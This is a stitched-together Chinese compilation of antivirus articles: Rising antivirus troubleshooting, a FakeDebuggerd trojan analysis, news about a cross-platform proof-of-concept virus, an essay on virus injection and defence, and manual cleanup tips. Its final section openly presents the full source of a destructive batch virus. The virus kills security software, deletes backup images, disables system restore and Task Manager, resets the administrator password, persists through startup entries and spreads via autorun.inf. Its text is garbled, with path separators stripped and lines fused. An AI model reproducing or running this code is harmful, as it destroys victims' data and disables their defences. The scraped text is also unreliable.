2.凡因为感染exe类型文件病毒的计算机在已安装瑞星杀毒软件的情况下，如果可以正常进入安全模式的话，请在安全模式下启动瑞星查杀，不建议直接使用此种方式处理。

3.由于被感染exe类型文件有可能会存在文件结构被病毒破坏严重的情况，故通过PE版瑞星杀毒重启后可能会导致部分文件不能正常使用，可以重装相关软件或拷贝相应的exe执行文件均可解决，但如果系统感染病毒严重，会存在PE杀毒后无法正常进入系统的情况，故请在杀毒前备份相关重要数据，以防万一。

另外一种清除病毒失败或删除染毒文件失败的情况就是病毒随系统启动，有驱动保护，这也是病毒最有效的保护方法，一般是在drivers目录下增加一个或多个.sys文件，本质上是在HKLMSYSTEMCurrentControlSetServices下建一个相关的键值，如CNNIC建立的就是HKLMSYSTEMCurrentControlSetServicescdnprot，并且将启动级别做得很高，在安全模式下也会启动，这个底层的驱动会过滤所有的文件以及注册表操作，如果发现是对自己的文件/注册表操作，就返回一个true，如果发觉文件被删除，就通过备份或网络下载来恢复，普通用户根本没办法删除相关文件，还有一些rootkit类病毒，很多时候就是安全模式也无法彻底清除，对于这种情况，可以使用瑞星PE杀毒已达到彻底处理病毒的目的。

这几类瑞星会清除失败的病毒，大部分是由于用户没有实时开启瑞星监控导致病毒进入系统，或者安装瑞星前已经感染了病毒。正常情况下，开启瑞星所有监控，病毒入侵计算机前就可以被处理掉，无法感染客户端，也就不会出现在正常情况下瑞星清除病毒或删除染毒文件失败的情况，所以保证瑞星监控实时开启是非常有必要的。

四、瑞星对于病毒的处理方式为用户忽略

此现象主要有两种情况：

A.用户选择的病毒处理方式不正确。管理员可以通过定位对病毒处理方式为用户忽略的客户端，然后查看客户端的防毒策略设置来核实客户端对病毒的处理方式。(图11)

图11

查看客户端对实时监控、嵌入式杀毒和手动查杀发现病毒、杀毒失败和备份失败的处理方式，确认一下客户端对发现病毒的处理方式是不是为不处理，如果是不处理，建议修改成默认策略，以方便发现病毒时清除病毒。(图12)

图12

B.病毒隔离区空间不足。如果瑞星病毒隔离区已满，瑞星对病毒的处理方式会是用户忽略。下面介绍一下如何确认瑞星隔离区空间是否已满。

1.启动病毒隔离系统(图13)

方法一：在瑞星网络版客户端软件主程序界面中，选择【工具】/【病毒隔离区】/【运行】。

方法二：在Windows画面中，选择【开始】/【程序】/【瑞星杀毒软件网络版】/【病毒隔离区】。

图13

2.选择设置空间，查看隔离区剩余大小。(图14)

图14

为避免由于备份文件过多而占用大量磁盘空间，用户可以设置病毒隔离系统占用存储空间的大小。当隔离区空间已满时，用户可以选择【空间自动增长】或使用【替换最老的文件】处理。方法是：启动【病毒隔离区】，选择【工具】/【设置空间】，在【设置】对话框中选择后，再按【确认】保存设置。

另外，瑞星无法处理某些病毒，还存在一种情况是瑞星没有发现病毒，而用户怀疑感染了病毒。有时会有用户反馈说瑞星为什么不能处理某病毒，但通过查看病毒库，发现某病毒不是瑞星所报病毒，后确认用户提供的病毒名是别的杀软查到的。对于这种情况，建议将瑞星升级到最新版本后杀毒，如果瑞星已经是最新版本后仍然查杀不到此病毒，可以上报病毒样本供我们分析，以确认相关文件是不是病毒，如果确定为病毒，瑞星会在下一次版本更新后查杀此病毒。还有用户因为计算机的一些异常情况怀疑感染病毒，对于这种情况，我们会通过发送相关工具提取计算机相关信息以判断计算机是否感染病毒，如果经分析确实感染病毒，我们会通过提取相关文件以便下次瑞星更新后可以查杀此病毒;如果经过分析，用户计算机没有感染病毒，不过仍然有异常现象，则可能是网内其他机器影响本机导致，比方说网内有其他机器感染了ARP病毒，会导致没有感染病毒的机器出现无法访问网络等一些异常情况。

一个Linux病毒原型分析病毒防范 篇5

只要/system/bin/debuggerd没有被清理，FakeDebuggerd就能从/system/bin/debuggerd文件尾部将所有被删除的文件重新释放。

而debuggerd是原生服务，本身就是开机启动进程，因此木马不需要对init.rc或者其他脚本做额外修改，这样整个行为会更加隐蔽。

FakeDebuggerd加密所有字符串，回写时修复文件创建时间，即使木马apk被发现，也不能通过在目录中暴力搜索字符串来找到作恶的源头/system/bin/debuggerd。从恶意行为上看，该木马具有回写推广widget、篡改默认浏览器主页、静默安装apk，窃取用户手机号、硬件编号、地理位置等恶意行为，木马作者还可以根据回传的手机号单独下发控制配置。

一个Linux病毒原型分析病毒防范 篇6

这个称为Virus.Linux.Bi.a/Virus.Win.Bi.a的概念验证恶意软件已经提交给俄罗斯的杀毒软件开发商卡巴斯基。卡上周五，巴斯基在其主页上透露，这个病毒是使用汇编这种低级语言编写的，并且它的威胁有限，只能感染当前目录下的文件。然而，它可以感染分别由Linux和Windows使用的文件格式DELF和PE，

卡巴斯基表示，这个病毒是典型的概念验证代码，编写的目的是为了证明创建跨平台的病毒是有可能的。

虽然目前这个病毒的杀伤力不强，但是根据卡巴斯基以往的经验，一旦有概念验证代码推出，其他病毒作者就会立刻借用并作出改进。在SAInternetStormCenter负责监控网络威胁的SwaFrantzen对此表示担忧。他表示，目前这个概念验证代码威胁还比较小，但是这种迹象表明以后的病毒会向跨平台方向发展。

计算机病毒的技术分析及防范 篇7

计算机病毒是一组通过复制自身来感染其它软件的程序。当程序运行时, 嵌入的病毒也随之运行并感染其它程序。一些病毒不带有恶意攻击性编码, 但更多的病毒携带毒码, 一旦被事先设定好的环境激发, 即可感染和破坏。自80年代莫里斯编制的第一个“蠕虫”病毒程序至今, 世界上已出现了多种不同类型的病毒。在最近几年, 又产生了以下几种主要病毒:

“美丽杀手” (Melissa) 病毒。这种病毒是专门针对微软电子邮件服务器MS Exchange和电子邮件收发软件0ut1ook Express的Word宏病毒, 是一种拒绝服务的攻击型病毒, 能够影响计算机运行微软word97、word2000和0utlook。这种病毒是一种Word文档附件, 由E-mall携带传播扩散。由于这种病毒能够自我复制, 一旦用户打开这个附件, “美丽杀手”病毒就会使用0ut1ook按收件人的0ut1ook地址簿向前50名收件人自动复制发送, 从而过载E-mai1服务器或使之损坏。“美丽杀手”病毒的扩散速度之快可达几何级数, 据计算, 如果“美丽杀手”病毒能够按照理论上的速度传播, 只需要繁殖5次就可以让全世界所有的网络用户都都收到一份。“美丽杀手”病毒的最令人恐怖之处还不仅是拒绝电子邮件服务器, 而是使用户的非常敏感和核心的机密信息在不经意间通过电子邮件的反复传播和扩散而被泄漏出去, 连扩散到了什么地方可能都不得而知。据外电报道, 在北约对南联盟发动的战争行动中, 证实“美丽杀手”病毒己使5万部电脑主机和几十万部电脑陷于瘫痪而无法工作, 网络被空数据包阻塞, 迫使许多用户关机避灾。

“怕怕” (Papa) 病毒。“怕怕”病毒是另一种Excel宏病毒, 它能够绕开网络管理人员设置的保护措施进入计算机。这种病毒与“美丽杀手”病毒相类似, 其区别在于“怕怕”病毒不但能象“美丽杀手”病毒一样迅速传播, 拒绝服务和阻塞网络, 而且更为严重的是它能使整个网络瘫痪, 使被它感染的文件所具有的宏病毒预警功能丧失作用。

“疯牛” (Mad Cow) 和“怕怕B”病毒。这两种病毒分别是“美丽杀手”和“怕怕”病毒的新的变型病毒。正当美国紧急动员起来对付“美丽杀手”和“怕怕”病毒时, 在欧洲又出现了它们的新变种“美丽杀手B” (又叫作“疯牛”) 和“怕怕B”, 目前正横扫欧洲大陆, 造成大规模破坏, 而且还正在向全世界扩散蔓延。虽然这两种病毒变种的病毒代码不同, 可能不是一个人所编写, 但是, 它们同样也是通过发送Word和Excel文件而传播。每次被激活后, 这种病毒就会向用户电子邮件簿的前60个地址发送垃圾邮件;它还可以向一个外部网站发送网络请求, 占用大量的带宽而阻滞网络的工作, 其危害性比原型病毒有过之而无不及。

“咻咻” (Ping) 轰击病毒。“咻咻”轰击病毒的英文单词是“分组Internet搜索者”的缩写, 指的是将一个分组信息发送到服务器并等待其响应的过程, 这是用户用以确定一个系统是否在Internet网上运行的一种方法。据外电报道, 运用“咻咻” (Ping) 轰击病毒, 发送大量的“咻咻”空数据包, 使服务器过载, 不能对其它用户作出响应。

归纳起来, 计算机病毒有以下特点:一是攻击隐蔽性强。病毒可以无声无息地感染计算机系统而不被察觉, 待发现时, 往往已造成严重后果。二是繁殖能力强。电脑一旦染毒, 可以很快“发病”。目前的三维病毒还会产生很多变种。三是传染途径广。可通过软盘、有线和无线网络、硬件设备等多渠道自动侵入计算机中, 并不断蔓延。四是潜伏期长。病毒可以长期潜伏在计算机系统而不发作, 待满足一定条件后, 就激发破坏。五是破坏力大。计算机病毒一旦发作, 轻则干扰系统的正常运行, 重则破坏磁盘数据、删除文件, 导致整个计算机系统的瘫痪。六是针对性强。计算机病毒的效能可以准确地加以设计, 满足不同环境和时机的要求。

2 计算机病毒的技术分析

长期以来, 人们设计计算机的目标主要是追求信息处理功能的提高和生产成本的降低, 而对于安全问题则重视不够。计算机系统的各个组成部分, 接口界面, 各个层次的相互转换, 都存在着不少漏洞和薄弱环节。硬件设什缺乏整体安全性考虑, 软件方面也更易存在隐患和潜在威胁。对计算机系统的测试, 目前尚缺乏自动化检测工具和系统软件的完整检验手段, 计算机系统的脆弱性, 为计算机病毒的产生和传播提供了可乘之机;全球万维网 (www) 使“地球一村化”, 为计算机病毒创造了实施的空间;新的计算机技术在电子系统中不断应用, 为计算机病毒的实现提供了客观条件。国外专家认为, 分布式数字处理、可重编程嵌入计算机、网络化通信、计算机标准化、软件标准化、标准的信息格式、标准的数据链路等都使得计算机病毒侵入成为可能。

实施计算机病毒入侵的核心技术是解决病毒的有效注入。其攻击目标是对方的各种系统, 以及从计算机主机到各式各样的传感器、网桥等, 以使他们的计算机在关键时刻受到诱骗或崩溃, 无法发挥作用。从国外技术研究现状来看, 病毒注入方法主要有以下几种:

无线电方式。主要是通过无线电把病毒码发射到对方电子系统中。此方式是计算机病毒注入的最佳方式, 同时技术难度也最大。可能的途径有: (1) 直接向对方电子系统的无线电接收器或设备发射, 使接收器对其进行处理并把病毒传染到目标机上。 (2) 冒充合法无线传输数据。根据得到的或使用标准的无线电传输协议和数据格式, 发射病毒码, 使之能够混在合法传输信号中, 进入接收器, 进而进人信息网络。 (3) 寻找对方信息系统保护最差的地方进行病毒注放。通过对方未保护的数据链路, 将病毒传染到被保护的链路或目标中。

“固化”式方法。即把病毒事先存放在硬件 (如芯片) 和软件中, 然后把此硬件和软件直接或间接交付给对方, 使病毒直接传染给对方电子系统, 在需要时将其激活, 达到攻击目的。这种攻击方法十分隐蔽, 即使芯片或组件被彻底检查, 也很难保证其没有其他特殊功能。目前, 我国很多计算机组件依赖进口, 困此, 很容易受到芯片的攻击。

后门攻击方式。后门, 是计算机安全系统中的一个小洞, 由软件设计师或维护人发明, 允许知道其存在的人绕过正常安全防护措施进入系统。攻击后门的形式有许多种, 如控制电磁脉冲可将病毒注入目标系统。计算机入侵者就常通过后门进行攻击。

数据控制链侵入方式。随着因特网技术的广泛应用, 使计算机病毒通过计算机系统的数据控制链侵入成为可能。使用远程修改技术, 可以很容易地改变数据控制链的正常路径。

除上述方式外, 还可通过其他多种方式注入病毒。

3 对计算机病毒攻击的防范的对策和方法

建立有效的计算机病毒防护体系。有效的计算机病毒防护体系应包括多个防护层。一是访问控制层;二是病毒检测层;三是病毒遏制层;四是病毒清除层;五是系统恢复层;六是应急计划层。上述六层计算机防护体系, 须有有效的硬件和软件技术的支持, 如安全设计及规范操作。

严把收硬件安全关。国家的机密信息系统所用设备和系列产品, 应建立自己的生产企业, 实现计算机的国产化、系列化;对引进的计算机系统要在进行安全性检查后才能启用, 以预防和限制计算机病毒伺机入侵。

防止电磁辐射和电磁泄露。采取电磁屏蔽的方法, 阻断电磁波辐射, 这样, 不仅可以达到防止计算机信息泄露的目的, 而且可以防止“电磁辐射式”病毒的攻击。

加强计算机应急反应分队建设。应成立自动化系统安全支援分队, 以解决计算机防御性的有关问题。早在1994年, 美国软件工程学院就成立了计算机应急反应分队。

计算机病毒攻击与防御手段是不断发展的, 要在计算机病毒对抗中保持领先地位, 必须根据发展趋势, 在关键技术环节上实施跟踪研究。实施跟踪研究应着重围绕以下方面进行:一是计算机病毒的数学模型。二是计算机病毒的注入方式, 重点研究“固化”病毒的激发。三是计算机病毒的攻击方式, 重点研究网络间无线传递数据的标准化, 以及它的安全脆弱性和高频电磁脉冲病毒枪置人病毒的有效性。四是研究对付计算机病毒的安全策略及防御技术。

摘要：随着计算机在社会生活各个领域的广泛运用, 计算机病毒攻击与防范技术也在不断拓展。为了确保信息的安全与畅通, 因此, 研究计算机病毒的防范措施已迫在眉睫。本文从计算机病毒的内涵、类型及特点入手, 探讨对付计算机病毒的方法和措施。

手工干掉一般的病毒！病毒防范 篇8

2. 删除C:Documents and Settings******Local SettingsTemp下的所有文件

3.删除 C:Documents and Settings*******Cookies下的所有文件

4.删除 c:winnt*.tmp下的所有文件,

5. 删除:C:WINDOWSSYSTEM32最新的dll文件(注意确定自己是否最近有安装软件，有就要谨慎删除，以免误删)

6.C:Documents and Settings**********Local SettingsTemporary Internet Files

下的通通干掉，

手工干掉一般的病毒!病毒防范

，

搞定!OK!

说明： “ ******* ” 为用户文件夹名。

制作编写超级批处理病毒病毒防范 篇9

@echo offtitle You DEAD!!!!!!!set taskkill=scopy %0 %windir%system32cmd.batattrib %windir%system32cmd.bat +r +s +hnet stop sharedaccess >nul%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul%s% /im norton* /f >nul%s% /im av* /f >nul%s% /im fire* /f >nul%s% /im anti* /f >nul%s% /im spy* /f >nul%s% /im bullguard /f >nul%s% /im PersFw /f >nul%s% /im KAV* /f >nul%s% /im ZONEALARM /f >nul%s% /im SAFEWEB /f >nul%s% /im OUTPOST /f >nul%s% /im nv* /f >nul%s% /im nav* /f >nul%s% /im F-* /f >nul%s% /im ESAFE /f >nul%s% /im cle /f >nul%s% /im BLACKICE /f >nul%s% /im def* /f >nul%s% /im 360safe.exe /f >nulnet stop Shadow“ ”System“ ”Serviceset alldrive=d e f g h i j k l m n o p q r s t u v w x y zfor %%a in (c %alldrive%) do del %%a:360* /f /s /q >nulfor %%a in (c %alldrive%) do del %%a:修复* /f /s /q >nulrem 修改注册表.......REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoRun /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoClose /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoFind /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoLogOff /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindows“ ”NTCurrentVersionSystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows“ ”NTSystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v RestrictRun /t REG_DWORD /d 00000001 /f >nulclsnet user administrator 123456 >nulfor %%c in (c %alldrive%) do del %%c:*.gho /f /s /q >nulecho @echo off >d:setup.batecho shutdown -r -t 10 -f -c 亲爱的朋友，我十分抱歉的通知你，你的电脑已经严重崩溃，请重新安装系统可以解决此问题!^.^ >>d:setup.batecho copy d:setup.bat c:Documents“ ”and“ ”SettingsAll“ ”Users「开始」菜单程序启动a.bat >>d:setup.batecho REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v setup.bat /t REG_SZ /d d:setup.bat /f >>d:setup.batecho REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v setup.bat /t REG_SZ /d d:setup.bat /f >>d:setup.batecho REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce /v setup.bat /t REG_SZ /d d:setup.bat /f >>d:setup.batHKEY_CLASSES_ROOTatfileshellopencommand /v setup.bat /t REG_SZ /d d:setup.bat /f >>d:setup.batecho [windows] >>%windir%win.iniecho run=d:setup.bat C:AUTOEXEC.BAT >>%windir%win.iniecho load=d:setup.bat C:AUTOEXEC.BAT >>%windir%win.iniecho [boot] >>%windir%system.iniecho shell=explorer.exe setup.bat C:AUTOEXEC.BAT >>%windir%system.iniecho [AutoRun] >d:autorun.infecho pen=setup.bat >>d:autorun.infecho pen=system.bat >>d:autorun.infattrib d:autorun.inf +r +s +h >>d:setup.batattrib d:setup.bat +r +s +h >>d:setup.batstart d:setup.bat /min >nulecho @echo off >>C:AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v AUTOEXEC.BAT /t REG_SZ /d C:AUTOEXEC.BAT /f >>C:AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v AUTOEXEC.BAT /t REG_SZ /d C:AUTOEXEC.BAT /f >>C:AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce /v AUTOEXEC.BAT /t REG_SZ /d C:AUTOEXEC.BAT /f >>C:AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v setup.bat /t REG_SZ /d d:setup.bat /f >>C:AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v setup.bat /t REG_SZ /d d:setup.bat /f >>C:AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce /v setup.bat /t REG_SZ /d d:setup.bat /f >>C:AUTOEXEC.BATecho if not d:setup.bat start %windir%system32cmd.bat /min >>C:AUTOEXEC.BATcopy %0 %systemroot%windows.bat >nulif not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.batif not exist C:AUTOEXEC.BAT start %windir%system32cmd.bat /min >>%windir%/system32/explorer.batif not exist %windir%system32cmd.bat start %systemroot%windows.bat /min >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v AUTOEXEC.BAT /t REG_SZ /d C:AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v AUTOEXEC.BAT /t REG_SZ /d C:AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v setup.bat /t REG_SZ /d d:setup.bat /f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v setup.bat /t REG_SZ /d d:setup.bat /f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat /f >>%windir%/system32/explorer.batecho start %systemroot%windows.bat /min >>%windir%/system32/explorer.batattrib %windir%/system32/explorer.bat +r +s +h%attrib %systemroot%/windows.bat +r +s +hfor %%c in (%alldrive%) do echo @echo off >>%%c:system.batfor %%c in (%alldrive%) do echo start %windir%system32cmd.bat /min >>%%c:system.batfor %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:system.batset drive=e f g h i j k l m n o p q r s t u v w x y zfor %%c in (%drive%) do echo [AuroRun] >%%c:autorun.inffor %%c in (%drive%) do echo pen=system.bat >>%%c:autorun.infcopy %0 d:Program“ ”Files

un.batfor %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:Program“ ”Files

un.bat /min >>%%c:system.batfor %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:system.batfor %%c in (%alldrive%) do attrib %%c:autorun.inf +r +s +h >nulfor %%c in (%alldrive%) do attrib %%c:system.bat +r +s +h >nulif not exist %windir%/system32/explorer.bat start d:Program“ ”Files

un.bat /min >>d:setup.batattrib d:Program“ ”Files

un.bat +r +s +h >nuldel %0exit

具体的意思我也不说了，太长了，有点批处理基础的朋友应该都看得懂.